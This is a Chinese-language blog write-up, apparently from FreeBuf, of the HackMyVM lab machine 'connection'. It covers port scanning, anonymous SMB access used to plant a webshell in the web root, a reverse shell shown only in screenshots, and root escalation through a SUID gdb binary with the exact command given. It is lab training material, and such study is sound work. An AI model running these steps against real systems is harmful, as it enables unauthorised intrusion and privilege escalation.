hackmyvm系列6——connection
2022-8-30 22:52:35 Author: www.freebuf.com(查看原文) 阅读量:6 收藏

freeBuf

主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

前言:

hackmyvm打靶系列文章。

本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!

所有环境均为在线下载的靶场,且在本机进行学习。

一、信息收集

netdiscover -r 192.168.56.0/24

nmap -sV -Pn -sC 192.168.56.151

1650780356_6264e8c49165a354b90bb.png!small?1650780357148

开放了22、80、445端口,对其进行目录扫描,顺便查看一下445是否存在空连接

gobuster dir -u http://192.168.56.151 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,html

smbclient -L 192.168.56.151

share存在空连接,登录进行查看,并且对其文件进行下载

smbclient \\\\192.168.56.151\\share

查看index.html发现没什么价值,这时候查看目录扫描也没有发现什么有用的东西,尝试利用445端口写入webshell看看是不是也是直接传入到网站上的。

成功写入到网站的目录中。

1650781012_6264eb5422f5c2b50e0f4.png!small?1650781012160

二、反弹shell

1650781165_6264ebeda2a338a951bc5.png!small?1650781165925

获得稳定的shell

python3 -c "import pty;pty.spawn('/bin/bash');"

三、权限提升

获得shell后,查看具有suid的文件

python3 -c "import pty;pty.spawn('/bin/bash');"

发现gdb,利用其进行提权

1650781461_6264ed154e85f277a66a3.png!small?1650781461359

./gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit

1650781476_6264ed2466cb553e3c398.png!small?1650781476469


文章来源: https://www.freebuf.com/articles/web/330811.html
如有侵权请联系:admin#unsafe.sh